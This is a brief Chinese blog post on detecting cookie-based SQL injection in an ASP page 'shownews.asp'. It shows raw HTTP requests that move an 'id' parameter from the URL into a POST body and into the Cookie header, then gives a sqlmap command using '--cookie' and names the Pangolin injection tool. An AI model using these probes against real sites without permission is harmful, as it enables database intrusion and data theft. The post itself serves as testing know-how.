web安全

如何检测cookie注入检测办法有哪些?

Admin 0

  检测cookie注入的办法就是吧get请求时候的参数放到post请求,如果正常可能就存在cookie注入。

  变换请求办法如下:

  原本样式:

  GET /shownews.asp?id=24 HTTP/1.1

  host:192.168.1.200:8012

  cookie:dmwh%5Fuser%5Fip=487131

  Connection:close

  修改为post:

  POST /shownews.asp HTTP/1.1

  host:192.168.1.200:8012

  cookie:dmwh%5Fuser%5Fip=487131

  Connection:close

  id=24

  这样就成为了POST请求。

  修改为cookie注入如下:

  GET /shownews.asp HTTP/1.1

  host:192.168.1.200:8012

  cookie:dmwh%5Fuser%5Fip=487131;id=24

  Connection:close

  还有一种方式就是使用sqlmap来跑:sqlmap.py -u “http://129.168.0.1:8012/shownews.asp” --cookie "id=24" --level 3

  sqlmap如果不输入cookie是跑不出来的,cookie最好是加上 --cookie!

  穿山甲工具也是可以的~

标签: cookie注入

留言与评论(共有 0 条评论)
验证码: